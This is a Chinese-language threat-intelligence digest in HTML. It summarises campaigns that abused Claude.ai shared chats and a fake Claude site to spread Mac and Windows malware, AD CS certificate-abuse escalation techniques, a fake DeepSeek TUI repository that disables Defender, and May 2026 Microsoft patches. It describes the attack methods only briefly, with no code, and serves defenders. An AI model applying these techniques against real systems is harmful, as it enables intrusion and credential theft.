0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035157" src="https://wechat2rss.xlab.app/img-proxy/?k=e90d6d70&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9kxCicWiaE39cCMqicMmKbj1pPNReSYcicPP5djjAv3jFmCRXhOjwoh8FsolGpob7ibicxyO0nCgcWicD7ibSxew1OmrFG05j0Ygoyic3k%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035155" src="https://wechat2rss.xlab.app/img-proxy/?k=42942eeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqicFLbicx2niaSQJZ6GgRicdQyotF58m6PsjgpK3sdRdzGuV94OT1LUd8fLXWpWdHc81sATtR3jTkrUoXiaK2Mgrupkg0EyDTGmWCac%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意代码情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035153" src="https://wechat2rss.xlab.app/img-proxy/?k=00d02445&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibU9eplrCwA9JMh9rhFOf4WwaDdUS7cAIxsJdQepa2eoE9zibHfCnQcOQdzS1HPyK0G9HOSTYgxiaNQEK5DBIzWe2iaomORlWu0LE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035154" src="https://wechat2rss.xlab.app/img-proxy/?k=9d676024&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq8OJwqc1gbVe82ofDz1nTR3fc5cleQbUSibwdAUgIdUPwzDYAQGo74kSG9gzHvbjwGKtj56CRO8fQ9ByuvHMzw9dDGBWayaAe68%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">黑客滥用谷歌广告和 Claude.ai 聊天功能推送 Mac 恶意软件</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月10日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/" target="_blank">https://www.bleepingcomputer.com/news/security/hackers-abuse-google-ads-claudeai-chats-to-push-mac-malware/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过Google广告诱导用户访问真实的Claude.ai网站，但利用Claude平台共享聊天功能展示伪造的安装教程，诱骗macOS用户复制终端命令，下载并执行MacSync信息窃取变种。恶意脚本会检查俄语键盘布局以规避特定区域，否则窃取浏览器凭证、Keychain等敏感数据并外传。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">02</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意模仿 Anthropic 的 Claude 网站会导致后门植入</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月7日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://www.sophos.com/en-us/blog/donuts-and-beagles-fake-claude-site-spreads-backdoor" target="_blank">https://www.sophos.com/en-us/blog/donuts-and-beagles-fake-claude-site-spreads-backdoor</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者通过伪造的Claude AI网站claude-pro.com分发恶意MSI安装包，利用DLL侧载技术执行DonutLoader载荷，最终解密并加载此前未记录的后门Beagle。该后门支持文件操作、命令执行等基本功能，通信采用AES加密。相关样本复用相同XOR密钥，表明可能存在持续化或模仿行为。</span></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">03</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">AD CS 升级内幕：剖析高级滥用技术和工具</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月11日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://origin-unit42.paloaltonetworks.com/active-directory-certificate-services-exploitation/" target="_blank">https://origin-unit42.paloaltonetworks.com/active-directory-certificate-services-exploitation/</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Active Directory Certificate Services因默认配置不当和证书模板权限设置过松，成为权限提升与身份伪造的高风险攻击面。攻击者利用低权限用户可申请高权限模板、允许请求者指定主体名称等错误配置，通过Certipy、Certify等工具枚举并请求伪造证书，结合PKINIT获取Kerberos票据实现权限提升；同时通过操纵msDS-KeyCredentialLink属性植入影子凭证，实现持久的无密码访问。</span></p></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.22407407407407406" data-s="300,640" data-type="png" data-w="1080" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035161" src="https://wechat2rss.xlab.app/img-proxy/?k=2da10d96&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FodcL3w4qOqibiccRNn6x0UQsR0jqRQ3neciag5hNlwWxDgufMz5BjO72AcQ62FnMr9lr0I5ib351icVWoNufm70nTqMDurFtVokh1SvB8YhZLD6M%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">04</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">AI软件仿冒攻击再现，DeepSeek TUI成伪装诱饵</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月9日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/SPN25Z4cLCHu7bEhVYTSNQ" target="_blank">https://mp.weixin.qq.com/s/SPN25Z4cLCHu7bEhVYTSNQ</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者利用DeepSeekTUI开源项目的热度，在GitHub上创建仿冒仓库，通过Releases页面投递恶意安装包。恶意样本采用分层评分机制和鼠标移动检测等反沙箱技术，通过检测后执行PowerShell脚本关闭Windows Defender防御并开放入站端口，随后从Azure DevOps、Pastebin等平台下载多个二阶段组件。这些组件具备计划任务与注册表持久化、CLR内存加载.NET程序集、NT系统调用注入等能力，最终与C2通信。该活动与先前仿冒OpenClaw的攻击具有相同特征代码和基础设施重叠，表明存在一个持续利用AI热点话题投递恶意软件的攻击团伙。</span></p></div><div style="text-align: center;justify-content: center;display: flex;flex-flow: row;margin: 10px 0% 20px;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: stretch;padding: 0px 10px;border-style: solid;border-width: 0px;border-color: rgb(62, 62, 62);box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 0px 0% -9px;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0%;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035160" src="https://wechat2rss.xlab.app/img-proxy/?k=79225d44&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOqiccpSa6DGeWFUXBG5ar34wuYUKciaxdpdKVLKzScojMzTZFKv7qt0p9yfE8uUzicfib46qvrzic0DEAialc56EkKJDvlodko2HHnKT0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035158" src="https://wechat2rss.xlab.app/img-proxy/?k=3a8fe4b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibpmHK23Fmx1Df5uex5NxiaG2UJOHicibmrJMib5O7KTTsFo9jib64JMQKIDankj0RI8KbgR27CGKmxgpEph1u6Z7wz06QZIhibmDkTM%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0%;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;flex: 100 100 0%;align-self: flex-start;height: auto;z-index: 2;margin: 0px;padding: 3px 6px;box-sizing: border-box;"><div style="font-size: 18px;color: rgb(55, 113, 187);line-height: 1.8;letter-spacing: 1.8px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞情报</span></strong></p></div></div></div><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: -10px 0% 0px;transform: rotateX(180deg);-webkit-transform: rotateX(180deg);-moz-transform: rotateX(180deg);-o-transform: rotateX(180deg);justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;line-height: 0;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;margin: 0px 0% 1px;transform: translate3d(-7px, 0px, 0px);-webkit-transform: translate3d(-7px, 0px, 0px);-moz-transform: translate3d(-7px, 0px, 0px);-o-transform: translate3d(-7px, 0px, 0px);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035162" src="https://wechat2rss.xlab.app/img-proxy/?k=1e07af0b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq9CpOgyepjxsqcvSfag4TBjm1Y9DYLeA0aZHFKIzztx9f8Vib3XCib6dqbUlgqRDqNuVad62wKW8yLTbZggxPqicgdwP9iaiarh91a4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;align-self: flex-start;flex: 100 100 0%;line-height: 0;letter-spacing: 0px;box-sizing: border-box;"><div style="transform: perspective(0px);-webkit-transform: perspective(0px);-moz-transform: perspective(0px);-o-transform: perspective(0px);transform-style: flat;box-sizing: border-box;"><div style="text-align: left;justify-content: flex-start;transform: translate3d(7px, 0px, 0px) rotateY(180deg);-webkit-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-moz-transform: translate3d(7px, 0px, 0px) rotateY(180deg);-o-transform: translate3d(7px, 0px, 0px) rotateY(180deg);display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 10px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;background-color: rgb(55, 113, 187);align-self: flex-start;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035159" src="https://wechat2rss.xlab.app/img-proxy/?k=80a79d28&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8icmMC73Pgypm2eotI2zr9b4KZljsRkuZ0Uic7gINnQw3hyR2fdGUFHrlxFicp3hVOf1zomVpibsKVtiarHxqZ96bCrrDVyHoYNIIU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div></div></div></div></div><div style="margin: 10px 0%;display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 11.2687 11.2687 0%;height: auto;background-color: rgb(55, 113, 187);line-height: 1;letter-spacing: 0px;border-width: 0px;border-radius: 3px;border-style: none;border-color: rgb(62, 62, 62);overflow: hidden;align-self: center;box-sizing: border-box;"><div style="margin: 2px 0%;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);line-height: 1;letter-spacing: 0px;text-align: right;padding: 0px 3px;box-sizing: border-box;"><p style="text-indent: 0em;text-align: center;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">01</span></strong></p></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;height: auto;line-height: 0;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(2px, 0px, 0px);-webkit-transform: translate3d(2px, 0px, 0px);-moz-transform: translate3d(2px, 0px, 0px);-o-transform: translate3d(2px, 0px, 0px);box-sizing: border-box;"><div style="line-height: 1.5;letter-spacing: 1px;padding: 0px 6px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">微软补丁日通告：2026年5月版</span></strong></p></div></div></div></div><div style="text-align: left;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">披露时间：</span></strong><span leaf="">2026年5月13日</span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">情报来源：</span></strong><span leaf=""><a href="https://mp.weixin.qq.com/s/2ErpPdqHXNjmqfCGROj2Cg" target="_blank">https://mp.weixin.qq.com/s/2ErpPdqHXNjmqfCGROj2Cg</a></span></p><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">相关信息：</span></strong></p></div><div style="text-align: left;box-sizing: border-box;"><p style="text-indent: 2.1333em;word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">微软2026年5月补丁日共发布137个漏洞补丁，其中23个值得重点关注，包括14个紧急漏洞和9个重要漏洞，涉及Microsoft Word远程代码执行、Windows图形组件、Hyper-V权限提升、SharePoint Server、Netlogon、DNS客户端等产品。多个漏洞已被标记为已遭利用或更易被利用，建议用户尽快安装更新。</span></p></div><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100035163" src="https://wechat2rss.xlab.app/img-proxy/?k=308ffdf1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOqibCBgVIMOWXsBnccib70EnHYFjxQF5AJxsRY2GEI5ORmOAMCG2a7x40ZiaX9AUS5W0fSUeSPAeuJFvlAxBockbshvTCYicMobDdEQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



